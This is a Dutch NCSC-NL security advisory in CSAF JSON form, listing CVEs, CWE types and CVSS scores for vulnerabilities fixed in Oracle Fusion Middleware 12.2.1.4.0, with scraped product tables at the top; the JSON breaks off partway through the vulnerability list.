cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
8.1 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
8.1 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
8.1 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
5.9 (Medium)
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware_mapviewer
oracle
|
cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*
|
— | |
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
CWE-770
- Allocation of Resources Without Limits or Throttling
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
fusion_middleware
oracle
|
cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*
|
— |
References
64 references
{
"document": {
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "nl",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:\n\n NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.\n\n NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.\n This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
},
{
"category": "description",
"text": "Er zijn kwetsbaarheden verholpen in Oracle Fusion Middleware.",
"title": "Feiten"
},
{
"category": "description",
"text": "Een kwaadwillende kan de kwetsbaarheden misbruiken om aanvallen uit te voeren die kunnen leiden tot de volgende categorie\u00ebn schade:\n\n* Denial-of-Service (DoS)\n* Toegang tot gevoelige gegevens\n* Toegang tot systeemgegevens\n* Manipulatie van gegevens\n* (Remote) code execution (Gebruikersrechten)",
"title": "Interpretaties"
},
{
"category": "description",
"text": "Oracle heeft updates beschikbaar gesteld om de kwetsbaarheden te verhelpen. Zie de referenties voor meer informatie.",
"title": "Oplossingen"
},
{
"category": "general",
"text": "medium",
"title": "Kans"
},
{
"category": "general",
"text": "high",
"title": "Schade"
},
{
"category": "general",
"text": "Heap-based Buffer Overflow",
"title": "CWE-122"
},
{
"category": "general",
"text": "Improper Neutralization of Section Delimiters",
"title": "CWE-145"
},
{
"category": "general",
"text": "Integer Overflow or Wraparound",
"title": "CWE-190"
},
{
"category": "general",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "general",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
},
{
"category": "general",
"text": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"title": "CWE-22"
},
{
"category": "general",
"text": "Truncation of Security-relevant Information",
"title": "CWE-222"
},
{
"category": "general",
"text": "Improper Access Control",
"title": "CWE-284"
},
{
"category": "general",
"text": "Improper Check for Certificate Revocation",
"title": "CWE-299"
},
{
"category": "general",
"text": "Missing Authentication for Critical Function",
"title": "CWE-306"
},
{
"category": "general",
"text": "Use of Weak Hash",
"title": "CWE-328"
},
{
"category": "general",
"text": "Insecure Temporary File",
"title": "CWE-377"
},
{
"category": "general",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "general",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "general",
"text": "Use After Free",
"title": "CWE-416"
},
{
"category": "general",
"text": "Files or Directories Accessible to External Parties",
"title": "CWE-552"
},
{
"category": "general",
"text": "URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)",
"title": "CWE-601"
},
{
"category": "general",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "general",
"text": "Out-of-bounds Write",
"title": "CWE-787"
},
{
"category": "general",
"text": "Server-Side Request Forgery (SSRF)",
"title": "CWE-918"
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "Nationaal Cyber Security Centrum",
"namespace": "https://www.ncsc.nl/"
},
"references": [
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13956"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1945"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29425"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45378"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24998"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29081"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2976"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34034"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36478"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45853"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46750"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4759"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48795"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5072"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52425"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6129"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0853"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21133"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21175"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21181"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21182"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21183"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22201"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22243"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22259"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22262"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25062"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26308"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29025"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29857"
},
{
"category": "external",
"summary": "Reference - oracle",
"url": "https://www.oracle.com/docs/tech/security-alerts/cpujul2024csaf.json"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; ibm; nvd; oracle",
"url": "https://www.oracle.com/security-alerts/cpujul2024.html"
}
],
"title": " Kwetsbaarheden verholpen in Oracle Fusion Middleware",
"tracking": {
"current_release_date": "2024-07-17T13:54:00.411174Z",
"id": "NCSC-2024-0298",
"initial_release_date": "2024-07-17T13:54:00.411174Z",
"revision_history": [
{
"date": "2024-07-17T13:54:00.411174Z",
"number": "0",
"summary": "Initiele versie"
}
],
"status": "final",
"version": "1.0.0"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "fusion_middleware_mapviewer",
"product": {
"name": "fusion_middleware_mapviewer",
"product_id": "CSAFPID-226018",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.4.0:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "fusion_middleware",
"product": {
"name": "fusion_middleware",
"product_id": "CSAFPID-271904",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*"
}
}
}
],
"category": "vendor",
"name": "oracle"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2020-1945",
"cwe": {
"id": "CWE-377",
"name": "Insecure Temporary File"
},
"notes": [
{
"category": "other",
"text": "Insecure Temporary File",
"title": "CWE-377"
}
],
"product_status": {
"known_affected": [
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2020-1945",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2020/CVE-2020-1945.json"
}
],
"title": "CVE-2020-1945"
},
{
"cve": "CVE-2020-13956",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2020-13956",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2020/CVE-2020-13956.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-226018",
"CSAFPID-271904"
]
}
],
"title": "CVE-2020-13956"
},
{
"cve": "CVE-2021-29425",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"title": "CWE-22"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2021-29425",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2021/CVE-2021-29425.json"
}
],
"title": "CVE-2021-29425"
},
{
"cve": "CVE-2021-37533",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"notes": [
{
"category": "other",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
},
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2021-37533",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2021/CVE-2021-37533.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-226018",
"CSAFPID-271904"
]
}
],
"title": "CVE-2021-37533"
},
{
"cve": "CVE-2022-40152",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-40152",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-40152.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-226018",
"CSAFPID-271904"
]
}
],
"title": "CVE-2022-40152"
},
{
"cve": "CVE-2022-45378",
"cwe": {
"id": "CWE-306",
"name": "Missing Authentication for Critical Function"
},
"notes": [
{
"category": "other",
"text": "Missing Authentication for Critical Function",
"title": "CWE-306"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-45378",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-45378.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-226018",
"CSAFPID-271904"
]
}
],
"title": "CVE-2022-45378"
},
{
"cve": "CVE-2023-2976",
"cwe": {
"id": "CWE-552",
"name": "Files or Directories Accessible to External Parties"
},
"notes": [
{
"category": "other",
"text": "Files or Directories Accessible to External Parties",
"title": "CWE-552"
}
],
"product_status": {
"known_affected": [
"CSAFPID-271904",
"CSAFPID-226018"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-2976",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-2976.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-271904",
"CSAFPID-226018"
]
}
],
"title": "CVE-2023-2976"
},
{
"cve": "CVE-2023-4759",
"product_status": {
"known_affected": [
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-4759",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-4759.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-271904"
]
}
],
"title": "CVE-2023-4759"
},
{
"cve": "CVE-2023-5072",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
}
],
"product_status": {
"known_affected": [
"CSAFPID-271904",
"CSAFPID-226018"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-5072",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-5072.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-271904",
"CSAFPID-226018"
]
}
],
"title": "CVE-2023-5072"
},
{
"cve": "CVE-2023-6129",
"cwe": {
"id": "CWE-328",
"name": "Use of Weak Hash"
},
"notes": [
{
"category": "other",
"text": "Use of Weak Hash",
"title": "CWE-328"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-6129",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-6129.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-226018",
"CSAFPID-271904"
]
}
],
"title": "CVE-2023-6129"
},
{
"cve": "CVE-2023-24998",
"cwe": {
"id": "CWE-404",
"name": "Improper Resource Shutdown or Release"
},
"notes": [
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
}
],
"product_status": {
"known_affected": [
"CSAFPID-271904",
"CSAFPID-226018"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-24998",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-24998.json"
}
],
"title": "CVE-2023-24998"
},
{
"cve": "CVE-2023-29081",
"cwe": {
"id": "CWE-404",
"name": "Improper Resource Shutdown or Release"
},
"notes": [
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-29081",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-29081.json"
}
],
"title": "CVE-2023-29081"
},
{
"cve": "CVE-2023-34034",
"cwe": {
"id": "CWE-284",
"name": "Improper Access Control"
},
"notes": [
{
"category": "other",
"text": "Improper Access Control",
"title": "CWE-284"
},
{
"category": "other",
"text": "Improper Neutralization of Section Delimiters",
"title": "CWE-145"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-34034",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-34034.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-226018",
"CSAFPID-271904"
]
}
],
"title": "CVE-2023-34034"
},
{
"cve": "CVE-2023-36478",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "other",
"text": "Integer Overflow or Wraparound",
"title": "CWE-190"
}
],
"product_status": {
"known_affected": [
"CSAFPID-271904",
"CSAFPID-226018"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-36478",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-36478.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-271904",
"CSAFPID-226018"
]
}
],
"title": "CVE-2023-36478"
},
{
"cve": "CVE-2023-45853",
"cwe": {
"id": "CWE-122",
"name": "Heap-based Buffer Overflow"
},
"notes": [
{
"category": "other",
"text": "Heap-based Buffer Overflow",
"title": "CWE-122"
},
{
"category": "other",
"text": "Integer Overflow or Wraparound",
"title": "CWE-190"
}
],
"product_status": {
"known_affected": [
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-45853",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-45853.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-271904"
]
}
],
"title": "CVE-2023-45853"
},
{
"cve": "CVE-2023-46750",
"cwe": {
"id": "CWE-601",
"name": "URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)"
},
"notes": [
{
"category": "other",
"text": "URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)",
"title": "CWE-601"
}
],
"product_status": {
"known_affected": [
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-46750",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-46750.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-271904"
]
}
],
"title": "CVE-2023-46750"
},
{
"cve": "CVE-2023-48795",
"cwe": {
"id": "CWE-222",
"name": "Truncation of Security-relevant Information"
},
"notes": [
{
"category": "other",
"text": "Truncation of Security-relevant Information",
"title": "CWE-222"
}
],
"product_status": {
"known_affected": [
"CSAFPID-271904",
"CSAFPID-226018"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-48795",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-48795.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-271904",
"CSAFPID-226018"
]
}
],
"title": "CVE-2023-48795"
},
{
"cve": "CVE-2023-52425",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
}
],
"product_status": {
"known_affected": [
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-52425",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-52425.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-271904"
]
}
],
"title": "CVE-2023-52425"
},
{
"cve": "CVE-2024-0853",
"cwe": {
"id": "CWE-299",
"name": "Improper Check for Certificate Revocation"
},
"notes": [
{
"category": "other",
"text": "Improper Check for Certificate Revocation",
"title": "CWE-299"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-0853",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-0853.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-226018",
"CSAFPID-271904"
]
}
],
"title": "CVE-2024-0853"
},
{
"cve": "CVE-2024-21133",
"product_status": {
"known_affected": [
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21133",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21133.json"
}
],
"title": "CVE-2024-21133"
},
{
"cve": "CVE-2024-21175",
"product_status": {
"known_affected": [
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21175",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21175.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-271904"
]
}
],
"title": "CVE-2024-21175"
},
{
"cve": "CVE-2024-21181",
"product_status": {
"known_affected": [
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21181",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21181.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-271904"
]
}
],
"title": "CVE-2024-21181"
},
{
"cve": "CVE-2024-21182",
"product_status": {
"known_affected": [
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21182",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21182.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-271904"
]
}
],
"title": "CVE-2024-21182"
},
{
"cve": "CVE-2024-21183",
"product_status": {
"known_affected": [
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21183",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21183.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-271904"
]
}
],
"title": "CVE-2024-21183"
},
{
"cve": "CVE-2024-22201",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-22201",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-22201.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-226018",
"CSAFPID-271904"
]
}
],
"title": "CVE-2024-22201"
},
{
"cve": "CVE-2024-22243",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"notes": [
{
"category": "other",
"text": "Server-Side Request Forgery (SSRF)",
"title": "CWE-918"
},
{
"category": "other",
"text": "URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)",
"title": "CWE-601"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-22243",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-22243.json"
}
],
"scores": [
{
